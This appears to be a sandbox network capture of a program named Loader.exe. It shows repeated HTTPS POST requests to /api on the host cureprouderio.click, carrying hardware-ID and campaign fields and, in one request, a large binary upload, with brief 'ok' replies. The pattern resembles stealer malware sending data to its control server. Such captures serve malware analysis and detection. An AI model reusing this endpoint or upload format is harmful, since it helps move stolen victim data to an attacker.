                                                                                                2024-12-28 03:14:02 UTC1369INData Raw: 76 4e 30 42 66 65 67 4f 35 65 78 6d 72 6d 4c 59 44 58 78 58 64 47 4d 4a 6b 4d 71 6f 78 33 46 63 53 6c 75 35 68 4a 33 54 4a 6b 33 6b 33 55 51 7a 36 68 65 70 76 69 47 46 55 38 34 52 65 68 52 51 63 78 53 49 78 72 62 61 63 6c 35 48 52 62 32 55 30 35 31 6e 55 65 4f 4d 53 69 76 37 48 2f 37 68 66 75 35 70 6d 51 42 38 46 69 73 6b 43 59 33 50 74 38 64 39 56 6b 46 62 73 34 47 57 32 53 74 4d 35 5a 55 44 65 65 67 4b 37 2b 78 69 72 6e 2f 59 43 33 52 66 66 57 31 43 7a 49 47 39 31 44 6b 48 42 47 57 67 67 34 76 65 4e 77 4c 57 6e 68 74 69 2b 41 4c 35 34 43 4f 50 63 39 55 45 64 56 46 6a 4a 42 33 4d 32 50 72 4c 64 52 38 63 45 37 43 41 6e 39 41 67 54 75 75 51 42 58 54 6d 41 4f 50 6f 63 36 39 31 30 51 74 34 57 32 46 75 43 4a 44 49 73 38 46 33 56 31 5a 51 38 4d 72 54 31 44 38
                                                                                                Data Ascii: vN0BfegO5exmrmLYDXxXdGMJkMqox3FcSlu5hJ3TJk3k3UQz6hepviGFU84RehRQcxSIxrbacl5HRb2U051nUeOMSiv7H/7hfu5pmQB8FiskCY3Pt8d9VkFbs4GW2StM5ZUDeegK7+xirn/YC3RffW1CzIG91DkHBGWgg4veNwLWnhti+AL54COPc9UEdVFjJB3M2PrLdR8cE7CAn9AgTuuQBXTmAOPoc6910Qt4W2FuCJDIs8F3V1ZQ8MrT1D8
                                                                                                2024-12-28 03:14:02 UTC1369INData Raw: 58 32 76 50 76 2f 72 63 61 4e 31 33 6a 6c 4f 57 48 52 77 42 59 7a 48 75 6f 77 33 48 30 73 54 36 4c 33 54 6d 32 64 2f 71 74 30 53 4d 37 56 50 33 4f 56 76 72 6e 66 50 46 6a 31 31 5a 48 49 49 6d 59 4f 63 79 32 68 57 55 6c 36 69 78 4e 32 54 49 51 43 38 7a 55 51 7a 36 52 36 70 76 6a 48 79 4b 34 78 55 4a 77 59 68 65 30 79 62 67 61 79 4d 49 51 30 4b 45 36 4c 45 79 35 4e 67 51 2f 61 50 44 48 44 37 44 4b 37 59 58 34 42 37 7a 77 5a 39 58 58 39 61 50 4a 66 43 74 4d 4a 2b 53 56 55 54 2f 73 53 63 6b 33 39 35 70 4e 56 4b 54 4b 4e 50 38 61 59 35 34 45 58 61 43 58 35 52 5a 58 56 50 6f 73 71 73 7a 58 52 55 53 42 47 78 69 59 50 55 5a 77 36 6b 6d 30 6f 72 76 55 47 70 34 6e 44 67 4b 49 6c 56 4b 77 4d 67 4d 31 4c 51 33 76 54 56 4f 55 6b 45 43 2b 4c 4b 30 38 46 6e 47 4b 54 61
                                                                                                Data Ascii: X2vPv/rcaN13jlOWHRwBYzHuow3H0sT6L3Tm2d/qt0SM7VP3OVvrnfPFj11ZHIImYOcy2hWUl6ixN2TIQC8zUQz6R6pvjHyK4xUJwYhe0ybgayMIQ0KE6LEy5NgQ/aPDHD7DK7YX4B7zwZ9XX9aPJfCtMJ+SVUT/sSck395pNVKTKNP8aY54EXaCX5RZXVPosqszXRUSBGxiYPUZw6km0orvUGp4nDgKIlVKwMgM1LQ3vTVOUkEC+LK08FnGKTa
                                                                                                2024-12-28 03:14:02 UTC1369INData Raw: 72 71 39 32 4b 67 65 35 6c 4a 4d 46 41 7a 50 46 44 4d 67 62 37 64 4f 51 63 55 41 65 76 52 77 49 52 33 45 76 76 54 45 7a 50 37 54 37 47 30 4c 2b 42 69 6d 56 38 77 45 58 42 32 45 49 54 43 72 4d 38 2b 59 58 70 31 73 34 4f 56 30 43 6c 58 39 64 38 6c 63 4f 59 44 35 65 46 33 6e 6b 37 4d 42 48 35 59 64 48 49 54 77 6f 2f 36 77 7a 6b 48 66 52 4f 68 6a 70 53 66 62 77 7a 31 6a 67 52 34 2b 77 69 70 32 53 2f 67 61 4a 6c 66 4d 47 4e 77 61 67 79 46 31 36 75 42 58 31 78 44 56 62 4f 4b 68 4d 4a 6e 44 71 53 62 53 69 75 2f 51 61 6e 69 63 4f 41 6f 69 56 55 72 41 79 41 7a 55 74 44 65 39 4e 55 35 53 51 51 4c 34 38 72 54 77 57 63 59 70 4e 6f 45 66 75 77 4d 35 2b 56 7a 73 6e 62 61 45 58 4d 52 54 56 6f 6e 6a 38 79 2f 77 6e 35 68 65 6e 4b 36 6c 4a 37 63 49 48 37 61 71 68 74 30 2f
                                                                                                Data Ascii: rq92Kge5lJMFAzPFDMgb7dOQcUAevRwIR3EvvTEzP7T7G0L+BimV8wEXB2EITCrM8+YXp1s4OV0ClX9d8lcOYD5eF3nk7MBH5YdHITwo/6wzkHfROhjpSfbwz1jgR4+wip2S/gaJlfMGNwagyF16uBX1xDVbOKhMJnDqSbSiu/QanicOAoiVUrAyAzUtDe9NU5SQQL48rTwWcYpNoEfuwM5+VzsnbaEXMRTVonj8y/wn5henK6lJ7cIH7aqht0/


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.549710172.67.132.74435396C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-28 03:14:03 UTC285OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=5JQYYRU4ZWU28LYM79
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 12842
                                                                                                Host: cureprouderio.click
                                                                                                2024-12-28 03:14:03 UTC12842OUTData Raw: 2d 2d 35 4a 51 59 59 52 55 34 5a 57 55 32 38 4c 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 35 4a 51 59 59 52 55 34 5a 57 55 32 38 4c 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 4a 51 59 59 52 55 34 5a 57 55 32 38 4c 59 4d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70
                                                                                                Data Ascii: --5JQYYRU4ZWU28LYM79Content-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--5JQYYRU4ZWU28LYM79Content-Disposition: form-data; name="pid"2--5JQYYRU4ZWU28LYM79Content-Disposition: form-data; name="lid"LPnhqo--hubcp
                                                                                                2024-12-28 03:14:04 UTC1128INHTTP/1.1 200 OK
                                                                                                Date: Sat, 28 Dec 2024 03:14:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=sll5dtqi9uofopg09svooeueni; expires=Tue, 22 Apr 2025 21:00:43 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BuofGQWI3P7B5%2FDCYmFSV%2Bk695yWUEH10CsThI62I2BF5q9QWjVgCxW88n4IvL6hFplx5Rd4HVh1A2YvWiWW3pyruo3fN2UpCQJ3Hu9Zpopc%2BW7Hd1OFuD2gVdwcwQAH5GoaZ6h3"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8e60c6a8f18cbd-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2042&min_rtt=2029&rtt_var=787&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2849&recv_bytes=13785&delivery_rate=1368322&cwnd=180&unsent_bytes=0&cid=d226efba1cb288ce&ts=884&x=0"
                                                                                                2024-12-28 03:14:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2024-12-28 03:14:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549711172.67.132.74435396C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-28 03:14:06 UTC279OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=M7OTKUL40DGV
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 15048
                                                                                                Host: cureprouderio.click
                                                                                                2024-12-28 03:14:06 UTC15048OUTData Raw: 2d 2d 4d 37 4f 54 4b 55 4c 34 30 44 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 4d 37 4f 54 4b 55 4c 34 30 44 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 37 4f 54 4b 55 4c 34 30 44 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 0d 0a 2d 2d 4d 37 4f 54 4b 55 4c
                                                                                                Data Ascii: --M7OTKUL40DGVContent-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--M7OTKUL40DGVContent-Disposition: form-data; name="pid"2--M7OTKUL40DGVContent-Disposition: form-data; name="lid"LPnhqo--hubcpvkeaidz--M7OTKUL
                                                                                                2024-12-28 03:14:06 UTC1132INHTTP/1.1 200 OK
                                                                                                Date: Sat, 28 Dec 2024 03:14:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=vonnh5teaufu25aup5mq3akjtu; expires=Tue, 22 Apr 2025 21:00:45 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXv6IIg2jiK%2BMg9xaH5k2MRy5TVmmOAB%2BxHifxS%2BYXLJMmcDC5Wp%2F8JPh1rM3yL1LWqEwuW9GcZFJWMcKOI0LMaOVDUf%2FyRL3DdscdffzvP1bqx6AskpFOS4OBtpall5HTdpKdrg"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8e60d5084d7c96-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1788&rtt_var=702&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2851&recv_bytes=15985&delivery_rate=1524804&cwnd=173&unsent_bytes=0&cid=7e53bdb59927dfd0&ts=865&x=0"
                                                                                                2024-12-28 03:14:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2024-12-28 03:14:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.549712172.67.132.74435396C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-28 03:14:08 UTC281OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=M8ZODEKLZRZCRA
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 20550
                                                                                                Host: cureprouderio.click
                                                                                                2024-12-28 03:14:08 UTC15331OUTData Raw: 2d 2d 4d 38 5a 4f 44 45 4b 4c 5a 52 5a 43 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 4d 38 5a 4f 44 45 4b 4c 5a 52 5a 43 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 38 5a 4f 44 45 4b 4c 5a 52 5a 43 52 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 0d 0a 2d 2d 4d
                                                                                                Data Ascii: --M8ZODEKLZRZCRAContent-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--M8ZODEKLZRZCRAContent-Disposition: form-data; name="pid"3--M8ZODEKLZRZCRAContent-Disposition: form-data; name="lid"LPnhqo--hubcpvkeaidz--M
                                                                                                2024-12-28 03:14:08 UTC5219OUTData Raw: d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00
                                                                                                Data Ascii: Zh'F3Wun 4F([:7s~X`nO`i
                                                                                                2024-12-28 03:14:09 UTC1130INHTTP/1.1 200 OK
                                                                                                Date: Sat, 28 Dec 2024 03:14:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=qjqb9sumdtnt7s08j7o6oktivr; expires=Tue, 22 Apr 2025 21:00:48 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=26SBYWQs67FYEMMquljuv%2FDMi3WHvC6VUYq6mQRtbMuEfxJAdwl3IJC4dPDdC5i3nhEbH16VrrmFxdQJXdKidB5wiHim%2FSg4Ec%2BdDJ2SKo8mXtIaKH39irdjljwDTUNRlQIrDjZC"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8e60e3d9ec0cba-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1705&rtt_var=676&sent=17&recv=25&lost=0&retrans=0&sent_bytes=2850&recv_bytes=21511&delivery_rate=1574973&cwnd=215&unsent_bytes=0&cid=3197a99fe92a6565&ts=1019&x=0"
                                                                                                2024-12-28 03:14:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2024-12-28 03:14:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.549713172.67.132.74435396C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-28 03:14:11 UTC283OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=803Z290KWT6RJEV57
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 1236
                                                                                                Host: cureprouderio.click
                                                                                                2024-12-28 03:14:11 UTC1236OUTData Raw: 2d 2d 38 30 33 5a 32 39 30 4b 57 54 36 52 4a 45 56 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 38 30 33 5a 32 39 30 4b 57 54 36 52 4a 45 56 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 30 33 5a 32 39 30 4b 57 54 36 52 4a 45 56 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65
                                                                                                Data Ascii: --803Z290KWT6RJEV57Content-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--803Z290KWT6RJEV57Content-Disposition: form-data; name="pid"1--803Z290KWT6RJEV57Content-Disposition: form-data; name="lid"LPnhqo--hubcpvke
                                                                                                2024-12-28 03:14:11 UTC1124INHTTP/1.1 200 OK
                                                                                                Date: Sat, 28 Dec 2024 03:14:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=8jkakvdoc7i3ob4hbbef4n8uas; expires=Tue, 22 Apr 2025 21:00:50 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hdZHe2XS2jmAQpYvJqNM0ddMd49y5ARgeYM2m3WgA25Cwc47pXrFuLhk7X4%2FRkFvvzpt5I5jWYViJmQFwutCLhMvn%2B0GYq1yNd41v628XjSncCFcluqPnim94w128jNBxboLL6uA"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8e60f52f5643cf-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1632&rtt_var=618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=2155&delivery_rate=1763285&cwnd=179&unsent_bytes=0&cid=1a8b596099cef1d2&ts=778&x=0"
                                                                                                2024-12-28 03:14:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                2024-12-28 03:14:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.549714172.67.132.74435396C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-28 03:14:13 UTC281OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: multipart/form-data; boundary=WZ2GIHF5D30ZJ
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 585642
                                                                                                Host: cureprouderio.click
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: 2d 2d 57 5a 32 47 49 48 46 35 44 33 30 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 57 5a 32 47 49 48 46 35 44 33 30 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 5a 32 47 49 48 46 35 44 33 30 5a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 0d 0a 2d 2d 57 5a 32 47
                                                                                                Data Ascii: --WZ2GIHF5D30ZJContent-Disposition: form-data; name="hwid"FAD730AECC011CA38246926E533C64D7--WZ2GIHF5D30ZJContent-Disposition: form-data; name="pid"1--WZ2GIHF5D30ZJContent-Disposition: form-data; name="lid"LPnhqo--hubcpvkeaidz--WZ2G
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: c5 33 73 16 de 19 75 5b 3a d3 84 66 c0 18 0b 13 b3 9c 4c 21 5c 28 73 54 55 f5 e2 4f 9d 1a 0a c7 fc 25 b4 e3 db 49 24 21 16 ea 9d f9 cd 0b 75 23 71 42 1e dd 8d d7 1e 8c 44 0a d0 ba 2d b8 5c 1d 10 ab 2f 34 7c 9c 9f a5 df 7f 23 c2 cb e3 5d 77 3e 14 05 a8 cd bc 37 e3 e7 b5 da a0 ad 44 24 b2 e5 0d 6d be 10 26 02 ed 7d 68 a3 c3 ff 46 ee 04 6c 1a 01 ec 12 d8 0a 93 40 cf a3 98 e5 32 c0 f6 00 06 16 d8 c2 72 1d b1 11 99 12 6b fb b6 bc c5 41 06 7d b8 1f 02 e4 3e 7a 6e 33 b6 d7 4a d0 e6 7f d7 71 f6 8b 80 b8 4d 11 a6 2d 40 22 b0 1f a1 32 20 e9 1a 70 42 b5 a9 cf ea da 13 39 78 7e a8 83 81 2a d3 7d 2a ce ee 4f 62 31 27 25 f7 86 fc 5e e0 84 41 2b 40 94 99 a5 52 ef 44 c0 4a 55 31 bd eb a0 f2 bd f9 b2 4c 21 1a e7 4f ea 6c 66 f8 8a 38 0d 45 e8 78 51 eb 5e 13 2a d1 7a 02 69
                                                                                                Data Ascii: 3su[:fL!\(sTUO%I$!u#qBD-\/4|#]w>7D$m&}hFl@2rkA}>zn3JqM-@"2 pB9x~*}*Ob1'%^A+@RDJU1L!Olf8ExQ^*zi
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: e2 d1 b7 2a ec 77 4a ef 10 23 d2 78 23 97 ae 99 c6 06 e8 57 e4 d3 3a 2b 56 a4 df 85 fb 66 c7 c5 c6 6e 1c 74 26 fd 8d be 75 05 c2 3f d3 61 d1 e6 38 3a a8 13 5c 19 a6 db fe 76 f4 9f fb f0 d9 d4 71 e2 89 8f e6 92 2b a3 8a 34 c2 eb 42 f2 8c 90 8f 10 b8 af ae 0b 79 76 76 4c d7 0f 6f dd 1a 98 bb bf 6b fe ef 01 c6 dc b5 7a de cd a0 01 df 37 55 ee fc e9 9e 6b 2d 68 42 a8 6c e5 53 5f 80 9f 0c 5a ff f6 75 28 64 c2 9d 65 6b 3c b5 d3 b1 7a 45 8a 20 d5 1d ac bd 7a 0d 35 59 78 1c 62 95 d7 27 a8 c4 41 a0 39 63 79 a2 9d c8 71 17 da 76 33 de e3 12 f4 ab 57 ac e1 80 1b db 01 30 3b fc b3 8a be 16 17 e1 41 86 a1 10 c4 a2 5c cd 83 48 df b0 70 3a 0e 36 9b a8 1d 46 68 31 1e 28 48 45 06 40 ff 77 7f 9f ce 7f e1 c3 48 d9 83 3c a2 76 da f1 ad 07 a0 d8 8e 49 15 01 fb 67 3f fe 6e 7a
                                                                                                Data Ascii: *wJ#x#W:+Vfnt&u?a8:\vq+4ByvvLokz7Uk-hBlS_Zu(dek<zE z5Yxb'A9cyqv3W0;A\Hp:6Fh1(HE@wH<vIg?nz
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: f0 5a f1 94 37 e7 85 1f dc 9b ee a9 60 1d 76 ec 9e 33 c3 b8 cb 46 54 e4 12 53 f0 c9 ea 56 90 7f 7d ba 39 0a 34 5c a5 b9 d8 7b 46 03 e4 15 f3 95 38 fe 1d 94 86 05 05 20 c4 8c be ed cb f6 50 68 7e 24 bd f0 52 2c ed 30 b0 e9 cb 34 6e e0 4a bb 9e e0 fe 56 fb e4 8a 30 18 7c ee aa 05 5b 60 ef 3a 30 77 b0 8c 3c 93 8d 87 cf 7f 4b 8f 38 05 d4 b5 f6 92 67 88 61 e5 56 d7 6a 58 06 d3 fa 46 b1 b1 fa 7d 03 d1 06 8a 65 0a cd 39 6d 96 3c 38 65 8a 75 45 ae 8f 11 8f a0 03 27 91 d6 e6 9d f0 ba 2e 8d a4 dc f1 25 aa e9 0c 84 a2 3b ca 43 80 38 af 75 af 5c 82 60 ce 9c 00 5b 77 d7 49 f3 95 7b 43 4e b4 b3 2b f7 6e 3e ed 5f 4c 86 92 86 dc a7 20 78 df 45 d9 3b a1 4b bc 24 c0 a7 c0 af 1a eb 12 6c 9b 20 9e 9b a2 08 aa fe 3a a4 41 2a 30 15 1c 10 2d 59 f7 5f b1 09 9b c9 6f 48 25 32 11
